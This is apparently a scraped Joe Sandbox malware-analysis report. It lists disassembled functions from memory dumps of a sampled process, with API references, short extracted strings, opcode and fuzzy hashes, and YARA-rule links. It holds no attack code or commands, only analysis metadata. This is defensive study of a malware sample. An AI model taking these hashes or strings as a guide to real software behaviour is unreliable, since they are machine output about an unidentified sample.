Associated: 00000010.00000002.2102256708.0000000001293000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001299000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1170000_ydRhqlPsLsIczR.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
API String ID: 3446177414-3154609507
Opcode ID: 20f8d9e625ffc1f6a94e1e3e685bdfd434e3f61d28638bfb7ca1205ffa67321d
Instruction ID: fbed56e78b28851b1c3750663773018c4355d1d26d12397c2a0c2423d28f7e02
Opcode Fuzzy Hash: 20f8d9e625ffc1f6a94e1e3e685bdfd434e3f61d28638bfb7ca1205ffa67321d
Instruction Fuzzy Hash: 7C41B232A342F2ABCB25EE5CD840A6A7BE4FF49A50F050559FE589B351D7B0D800CB92

Function 011CDBA0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 84timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 0120F757

Strings

RtlLockHeap, xrefs: 0120F7A3
Invalid heap signature for heap at %p, xrefs: 0120F799
, passed to %s, xrefs: 0120F7A8

Memory Dump Source

Source File: 00000010.00000002.2102256708.0000000001196000.00000040.00001000.00020000.00000000.sdmp, Offset: 01170000, based on PE: true

Associated: 00000010.00000002.2102256708.0000000001170000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001177000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.00000000011F0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.00000000011F6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001232000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001293000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001299000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1170000_ydRhqlPsLsIczR.jbxd

Similarity

API ID: DebugPrintTimes
String ID: , passed to %s$Invalid heap signature for heap at %p$RtlLockHeap
API String ID: 3446177414-3526935505
Opcode ID: 2e8677a8c47d6c66ff3a04d4fd5943020c567b53feef2f5bc8f28a3f8d276ca1
Instruction ID: b4c74508ef84944acfdbc9d882bed525dba83f4a8460fcf6bcfeaa581fe64622
Opcode Fuzzy Hash: 2e8677a8c47d6c66ff3a04d4fd5943020c567b53feef2f5bc8f28a3f8d276ca1
Instruction Fuzzy Hash: 38312431164784DFDB3FDB6CDA4DB697BE4EB12B14F04415DE402876A2C7B8A880C796

Function 0119C070 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 0119C0B4
RtlDebugPrintTimes.NTDLL ref: 011FD623
RtlDebugPrintTimes.NTDLL ref: 011FD651

Strings

$, xrefs: 0119C07C

Memory Dump Source

Source File: 00000010.00000002.2102256708.0000000001196000.00000040.00001000.00020000.00000000.sdmp, Offset: 01170000, based on PE: true

Associated: 00000010.00000002.2102256708.0000000001170000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001177000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.00000000011F0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.00000000011F6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001232000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001293000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001299000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1170000_ydRhqlPsLsIczR.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $
API String ID: 3446177414-3993045852
Opcode ID: dc123ff57370e96a239f441ba7955af7d83c552589160d64dfc88e55b8012d19
Instruction ID: 7d0b7e0ee1910179f4749065c6e478a4f16e70a84e203c9dddb9baa07e6c1145
Opcode Fuzzy Hash: dc123ff57370e96a239f441ba7955af7d83c552589160d64dfc88e55b8012d19
Instruction Fuzzy Hash: FE111E72904218EBCF19AFA8F8486AD7B71FF44775F10851DF9266B2E0CB715A40CB80

Function 011CEF28 Relevance: 6.3, APIs: 4, Instructions: 347COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2102256708.0000000001196000.00000040.00001000.00020000.00000000.sdmp, Offset: 01170000, based on PE: true

Associated: 00000010.00000002.2102256708.0000000001170000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001177000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.00000000011F0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.00000000011F6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001232000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001293000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001299000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1170000_ydRhqlPsLsIczR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ac99a489893f712fab9893de118ff3642a37a715a2549e62b2e07ae8b6f9328
Instruction ID: 35fd3ea3d926bce2cc9e167ecfa5622bd5b81b5b922ffd5c26b0a2d169e693cd
Opcode Fuzzy Hash: 0ac99a489893f712fab9893de118ff3642a37a715a2549e62b2e07ae8b6f9328
Instruction Fuzzy Hash: 61E10270D00609DFCB29CFA9C984AADBBF2FF98714F24452EE546A7261D770A842CF11

Function 0121EF50 Relevance: 6.2, APIs: 4, Instructions: 187timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 0121EFE1
RtlDebugPrintTimes.NTDLL ref: 0121F009
RtlDebugPrintTimes.NTDLL ref: 0121F0AC
RtlDebugPrintTimes.NTDLL ref: 0121F160

Memory Dump Source

Source File: 00000010.00000002.2102256708.00000000011F6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01170000, based on PE: true

Associated: 00000010.00000002.2102256708.0000000001170000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001177000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001196000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.00000000011F0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001232000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001293000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001299000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1170000_ydRhqlPsLsIczR.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: d474b8448774fdb3a90aa4c6affbb2a98a1a4b55beb6be760acf665a65171df3
Instruction ID: fae2d490a22f5c09426ba5e4c0c79982a6db77402f64b9ead6386f9779fe5d8a
Opcode Fuzzy Hash: d474b8448774fdb3a90aa4c6affbb2a98a1a4b55beb6be760acf665a65171df3
Instruction Fuzzy Hash: B8713971E202199FDF05CFA8C984ADDBBF5BF58314F14402AEA15EB258D774A909CB90

Function 0121F1D6 Relevance: 6.2, APIs: 4, Instructions: 150timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 0121F26D
RtlDebugPrintTimes.NTDLL ref: 0121F292
RtlDebugPrintTimes.NTDLL ref: 0121F324
RtlDebugPrintTimes.NTDLL ref: 0121F378

Memory Dump Source

Source File: 00000010.00000002.2102256708.00000000011F6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01170000, based on PE: true

Associated: 00000010.00000002.2102256708.0000000001170000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001177000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001196000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.00000000011F0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001232000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001293000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001299000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1170000_ydRhqlPsLsIczR.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 3fedc9db213738663ad8cef0651fb1f4f51ddc9d0d1f9ddbe981a048384646d5
Instruction ID: 4519e4131afe9de6aab64f658ec9543304ddbe0cfa2e2d89ab7896bd0d5df793
Opcode Fuzzy Hash: 3fedc9db213738663ad8cef0651fb1f4f51ddc9d0d1f9ddbe981a048384646d5
Instruction Fuzzy Hash: 8C5175B2E102199FDF08CF98D949ADCBBF1BF58314F18812AE925B7258D3349909CF50

Function 011D7B2F Relevance: 6.1, APIs: 4, Instructions: 81timethreadCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 011D7B52
BaseThreadInitThunk.KERNEL32 ref: 011D7B5C
RtlDebugPrintTimes.NTDLL ref: 012149ED
RtlDebugPrintTimes.NTDLL ref: 01214A70

Memory Dump Source

Source File: 00000010.00000002.2102256708.0000000001196000.00000040.00001000.00020000.00000000.sdmp, Offset: 01170000, based on PE: true

Associated: 00000010.00000002.2102256708.0000000001170000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001177000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.00000000011F0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.00000000011F6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001232000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001293000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001299000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1170000_ydRhqlPsLsIczR.jbxd

Similarity

API ID: DebugPrintTimes$BaseInitThreadThunk
String ID:
API String ID: 4281723722-0
Opcode ID: bb541afca3fd3efe85dead92f1e0285ba58be151796efa050c82baa05ec05c73
Instruction ID: 1b83ac18798a674ea211ed6e0b9ed15f46dd80fb63a7d55467bf59b56484401a
Opcode Fuzzy Hash: bb541afca3fd3efe85dead92f1e0285ba58be151796efa050c82baa05ec05c73
Instruction Fuzzy Hash: 92315672E102199FCF25EFA8E898AADBBF1FB58320F10412AE511B7294C7345900CF54

Function 011A59C0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 494COMMON

Download Yara Rule

Strings

@, xrefs: 01200AA7

Memory Dump Source

Source File: 00000010.00000002.2102256708.0000000001196000.00000040.00001000.00020000.00000000.sdmp, Offset: 01170000, based on PE: true

Associated: 00000010.00000002.2102256708.0000000001170000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001177000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.00000000011F0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.00000000011F6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001232000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001293000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001299000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1170000_ydRhqlPsLsIczR.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: f12585fb839207da31dd958e0a023c1201c212bd6395469244191a19c9f47c69
Instruction ID: 5dabebc27bf95c1099842033a6d4db318295ab112a8eecabef71e51e99e5f53a
Opcode Fuzzy Hash: f12585fb839207da31dd958e0a023c1201c212bd6395469244191a19c9f47c69
Instruction Fuzzy Hash: 05328A74D0426ADFDB69CF68C884BEDBFB5BB08308F4481E9D509A7282D7745A84CF91

Function 011E7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 011E7E8B

Strings

-, xrefs: 011E7DDD
+, xrefs: 011E7DE8

Memory Dump Source

Source File: 00000010.00000002.2102256708.0000000001196000.00000040.00001000.00020000.00000000.sdmp, Offset: 01170000, based on PE: true

Associated: 00000010.00000002.2102256708.0000000001170000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001177000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.00000000011F0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.00000000011F6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001232000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001293000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001299000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1170000_ydRhqlPsLsIczR.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: d84d73e5c23e50fb3757e9c39722a22be4762bc4311d32b0c95698253cae6a4f
Instruction ID: 649128a9332493d380c5c3257d7a8f759753e6c9537132f3fa2544121e5fdda1
Opcode Fuzzy Hash: d84d73e5c23e50fb3757e9c39722a22be4762bc4311d32b0c95698253cae6a4f
Instruction Fuzzy Hash: 3891A471E00A169AFB2CDFEDC8986BEBBE5FF44720F14451AE965E72C0D73089418792

Function 011BD02D Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 011BD3A4

Strings

Bl, xrefs: 011BD48C
l, xrefs: 011BD46B

Memory Dump Source

Source File: 00000010.00000002.2102256708.0000000001196000.00000040.00001000.00020000.00000000.sdmp, Offset: 01170000, based on PE: true

Associated: 00000010.00000002.2102256708.0000000001170000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001177000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.00000000011F0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.00000000011F6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001232000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001293000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001299000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1170000_ydRhqlPsLsIczR.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Bl$l
API String ID: 3446177414-208461968
Opcode ID: d8f69cea36167a939fab7e94cc2addae4e67ff5203b2769456e7ae481c604b46
Instruction ID: 3810091d24f34243fc3c29451ef72538e3b548a83a858149579903a67e065add
Opcode Fuzzy Hash: d8f69cea36167a939fab7e94cc2addae4e67ff5203b2769456e7ae481c604b46
Instruction Fuzzy Hash: D7A1D470A013699BEF3DDB98E8C4BE9B7B1BB44308F0540E9D909A7641CB74AE84CF51

Function 011E5DA4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 011E5E34

Strings

pow, xrefs: 011E5E0C, 011E5E29

Memory Dump Source

Source File: 00000010.00000002.2102256708.0000000001196000.00000040.00001000.00020000.00000000.sdmp, Offset: 01170000, based on PE: true

Associated: 00000010.00000002.2102256708.0000000001170000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001177000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.00000000011F0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.00000000011F6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001232000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001293000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001299000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1170000_ydRhqlPsLsIczR.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 995e78f7dfc80d6c8dbff555be46d4c7176e31108cd69a087b30ef54261a640d
Instruction ID: e7deeb7195e648f55a56f782161cd6bebfe6d390d734e8ff12dbf039590f1c5e
Opcode Fuzzy Hash: 995e78f7dfc80d6c8dbff555be46d4c7176e31108cd69a087b30ef54261a640d
Instruction Fuzzy Hash: E0519D3490CE0296DB6DB7ECE50D36E7FE2EB40718F14C858E09686299EB30C4D5874B

Function 011D4C59 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON

Download Yara Rule

Strings

Flst, xrefs: 011D4C96
0, xrefs: 011D4CC3

Memory Dump Source

Source File: 00000010.00000002.2102256708.0000000001196000.00000040.00001000.00020000.00000000.sdmp, Offset: 01170000, based on PE: true

Associated: 00000010.00000002.2102256708.0000000001170000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001177000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.00000000011F0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.00000000011F6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001232000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001293000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001299000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1170000_ydRhqlPsLsIczR.jbxd

Similarity

API ID:
String ID: 0$Flst
API String ID: 0-758220159
Opcode ID: ce0010dfda9b05fe581108bba9c1a3e80f92c2521f9ad4d2a68b8a3949a37dc3
Instruction ID: 128525df95451bc67498f47d776672da8e87f92baf597df086296624a25e2469
Opcode Fuzzy Hash: ce0010dfda9b05fe581108bba9c1a3e80f92c2521f9ad4d2a68b8a3949a37dc3
Instruction Fuzzy Hash: 7E51EDB1E006198FDF2ACF98D4846ADFBF5FF54718F19802ED1099BA45E770A981CB80

Function 011CD7B0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 151timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 011CD959

Part of subcall function 011A4859: RtlDebugPrintTimes.NTDLL ref: 011A48F7

Strings

$, xrefs: 011CD86D
$, xrefs: 011CD900

Memory Dump Source

Source File: 00000010.00000002.2102256708.0000000001196000.00000040.00001000.00020000.00000000.sdmp, Offset: 01170000, based on PE: true

Associated: 00000010.00000002.2102256708.0000000001170000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001177000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.00000000011F0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.00000000011F6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001232000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001293000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001299000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1170000_ydRhqlPsLsIczR.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $$$
API String ID: 3446177414-233714265
Opcode ID: efc1833077e68d85643f8ce1061efdbdb49beb8e842c538d3f802313d536e435
Instruction ID: 7c7ee7b2e279c05d7a363389f020c3403c8351dfbd67e45dd84b170f656b37de
Opcode Fuzzy Hash: efc1833077e68d85643f8ce1061efdbdb49beb8e842c538d3f802313d536e435
Instruction Fuzzy Hash: FC51FE71A003469FDF29DFA8E4887EEBBB1BB68B18F14416DD5056B285D770A881CBC0

Function 0122CEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON

Download Yara Rule

APIs

@_EH4_CallFilterFunc@8.LIBCMT ref: 0122CFBD

Strings

@4Qw@4Qw, xrefs: 0122CFD5, 0122CFDA, 0122CFF1
@, xrefs: 0122CF0A

Memory Dump Source

Source File: 00000010.00000002.2102256708.00000000011F6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01170000, based on PE: true

Associated: 00000010.00000002.2102256708.0000000001170000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001177000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001196000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.00000000011F0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001232000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001293000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001299000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1170000_ydRhqlPsLsIczR.jbxd

Similarity

API ID: CallFilterFunc@8
String ID: @$@4Qw@4Qw
API String ID: 4062629308-2383119779
Opcode ID: 62ab14077940eb2fbb8db533457bfb5e23b672e5da83e42365e5f456427ed02f
Instruction ID: d675e4797644906d1af72eb9c0d4f2808fcf2c8382ebaa02fca5ad3a72b0ac9c
Opcode Fuzzy Hash: 62ab14077940eb2fbb8db533457bfb5e23b672e5da83e42365e5f456427ed02f
Instruction Fuzzy Hash: C241F471910229EFCB25DFE9C844AAEBBF8FF54B14F00402AEA04DB264D734D901CB61

Function 0121FD82 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 0121FE73
RtlDebugPrintTimes.NTDLL ref: 0121FE95

Strings

$, xrefs: 0121FE3D

Memory Dump Source

Source File: 00000010.00000002.2102256708.00000000011F6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01170000, based on PE: true

Associated: 00000010.00000002.2102256708.0000000001170000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001177000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001196000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.00000000011F0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001232000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001293000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001299000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1170000_ydRhqlPsLsIczR.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $
API String ID: 3446177414-3993045852
Opcode ID: dbea00f7f1d27a8670a239a16ccfb62ebd3f7da245b8c68cd97f7266423e608b
Instruction ID: 51abbee86e09301ef09657bd08e3d1f95551fb507aca2e82a0051655a78d817b
Opcode Fuzzy Hash: dbea00f7f1d27a8670a239a16ccfb62ebd3f7da245b8c68cd97f7266423e608b
Instruction Fuzzy Hash: 2F41BEB5A0020AABDF25DF99DA80AEEBBF5FF58B14F144019EE10A7305C7719905CBA0

Function 0119DF81 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 0119E040

Strings

0, xrefs: 0119E020
0, xrefs: 0119E00B

Memory Dump Source

Source File: 00000010.00000002.2102256708.0000000001196000.00000040.00001000.00020000.00000000.sdmp, Offset: 01170000, based on PE: true

Associated: 00000010.00000002.2102256708.0000000001170000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001177000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.00000000011F0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.00000000011F6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001232000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001293000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.2102256708.0000000001299000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1170000_ydRhqlPsLsIczR.jbxd

Similarity

API ID: DebugPrintTimes
String ID: 0$0
API String ID: 3446177414-203156872
Opcode ID: bd5191937b22b2af2c23a90ad0a149d53420b14096cee83491ed5bed875c7c90
Instruction ID: 06ea6dce457ff3ffd1509aa006a941dee7c4b073adfcb5c760e8eb43039be3b5
Opcode Fuzzy Hash: bd5191937b22b2af2c23a90ad0a149d53420b14096cee83491ed5bed875c7c90
Instruction Fuzzy Hash: 04418DB16087069FCB14CF68D484A56BBE4BF88718F04492EF598DB341D771EA06CF96

Analysis Process: IBBkYiJCUMDfM.exePID: 5544, Parent PID: 5972COMMON

Executed Functions

Function 04004254 Relevance: 38.0, Strings: 30, Instructions: 487COMMON

Download Yara Rule

Strings

j", xrefs: 0400464A
x, xrefs: 04004380
(S, xrefs: 0400433C
&, xrefs: 04004545
S, xrefs: 040043A8
7, xrefs: 04004454
-, xrefs: 04004408
", xrefs: 04004364
y, xrefs: 04004290
x, xrefs: 040043B2
g, xrefs: 0400427C
x, xrefs: 0400453E
^, xrefs: 040046F3
|, xrefs: 04004426
N, xrefs: 040044DF
g\, xrefs: 04004A1F
[X, xrefs: 04004314
qN, xrefs: 040049E1
*, xrefs: 0400444A
:, xrefs: 0400445E
y>, xrefs: 040043DC
H, xrefs: 04004372
~G, xrefs: 040048A3
M, xrefs: 04004379
#, xrefs: 040043FE
l, xrefs: 0400439E
p0, xrefs: 04004C1A
fz, xrefs: 0400455C
sy, xrefs: 040042D9
_, xrefs: 040042AE

Memory Dump Source

Source File: 00000014.00000002.4059439629.0000000003FC0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3fc0000_IBBkYiJCUMDfM.jbxd

Yara matches

Similarity

API ID:
String ID: "$#$&$(S$*$-$7$:$H$M$N$S$[X$^$_$fz$g$g\$j"$l$p0$qN$sy$x$x$y$y>$|$~G$x
API String ID: 0-73376672
Opcode ID: 2cb386455082c6c53c30f300edffbc0a7b45324dfda009840397f8763fd86a72
Instruction ID: a5694a19c3d8108d8b5d3bc15e413014ded1dc0084d1ef5c10d28db566b9e52c
Opcode Fuzzy Hash: 2cb386455082c6c53c30f300edffbc0a7b45324dfda009840397f8763fd86a72
Instruction Fuzzy Hash: 67528EB0E05268CBEB64CF84C994BDDBBB1BB45308F1081DAD60D7B280D7756A85CF59

Function 04012004 Relevance: 6.4, Strings: 5, Instructions: 153COMMON

Download Yara Rule

Strings

s, xrefs: 0401208B
S, xrefs: 04012084
6, xrefs: 04012099
O, xrefs: 04012092
\, xrefs: 040120A0

Memory Dump Source

Source File: 00000014.00000002.4059439629.0000000003FC0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_3fc0000_IBBkYiJCUMDfM.jbxd

Yara matches

Similarity

API ID:
String ID: 6$O$S$\$s
API String ID: 0-3854637164
Opcode ID: f07cee9689c26ab63c69a85e68cb540f49fc94e7d0d26b1c5d1c424bb27e020b
Instruction ID: 024160aa20ae053e6f389e597876993a164244c18d8d9890373578815d46f753
Opcode Fuzzy Hash: f07cee9689c26ab63c69a85e68cb540f49fc94e7d0d26b1c5d1c424bb27e020b
Instruction Fuzzy Hash: 1151A372D02118ABEB14DF98DD49BEEB3B8EF54718F108199EE0C7B150E7716A14CBA1

